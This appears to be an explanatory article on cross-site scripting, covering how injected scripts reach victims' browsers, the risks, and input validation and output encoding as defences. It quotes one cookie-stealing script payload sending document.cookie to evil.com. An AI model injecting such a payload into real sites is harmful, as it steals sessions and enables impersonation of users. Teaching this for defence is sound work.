What is it?
Cross-Site Scripting (XSS) is a type of attack where a cyber-criminal injects malicious scripts (aka a malicious payload) into a legitimate website or web application.
Our Experts Explain
XSS vulnerabilities occur when a web application accepts user input, and dynamically includes that data in the web pages it generates without first validating the inputted data.
There is no need to target victims directly. An attacker simply exploits a vulnerability within a website or app that a victim visits, therefore using the website as a conduit to deliver a malicious payload to the victim’s browser.
Websites that require direct user input in its pages, are the most vulnerable, as attackers can simply replace the input text with malicious code.
As the page loads in the victim’s browser, the malicious script will execute, most often unbeknownst to the user.
Important Note — An XSS vulnerability can only exist if the payload (malicious script) that the attacker inserts ultimately get parsed (as HTML in this case) in the victim’s browser
Structure of a Cross-Site Scripting Attack
An XSS attack has three players — the website, the victim and the attacker.
<script>window.location=“http://evil.com/?cookie=” + document.cookie</script>
The figure below illustrates a step-by-step walkthrough of a simple XSS attack.
Figure 1: Sourced from http://www.acunetix.com
- The victim requests the web page from the website
- The website serves the victim’s browser the page with the attacker’s payload as part of the HTML body.
- The victim’s browser will execute the malicious script inside the HTML body. In this case it would send the victim’s cookie to the attacker’s server. The attacker now simply needs to extract the victim’s cookie when the HTTP request arrives to the server, after which the attacker can use the victim’s stolen cookie for impersonation.
The victims of an XSS attack are the users of an application, not the application itself. XSS vulnerabilities are powerful, because the malicious code executes within the victim’s session, permitting the attacker to avoid normal security restrictions.
Examples of XSS Attacks
What Are The Risks?
A successful XSS attack can provide the attacker with access to account credentials, spread web worms, access the user’s computer and view their browser history and even control the browser remotely. Once they have control of the victim’s system, attackers can also check other internet applications for vulnerabilities. By taking advantage of XSS vulnerabilities, an attacker can perform a range of malicious actions. For example, they could:
- Hijack an account.
- Spread web worms.
- Obtain a user’s session cookie and use it to impersonate that user.
- Access browser history and clipboard contents.
- Control the browser remotely.
- Scan and exploit intranet appliances and applications.
- Leverage HTML5 APIs to access a user’s geolocation, webcam, microphone and even the specific files from the user’s file system.
How Can You Protect Against XSS Attacks?
XSS vulnerabilities occur in the following situations when:
- Input coming into web applications is not validated
- Output to the browser is not HTML encoded
XSS vulnerabilities should not still exist, because they are easy to find and fix. Ensure that you have done your due diligence to protect your business from these avoidable attacks.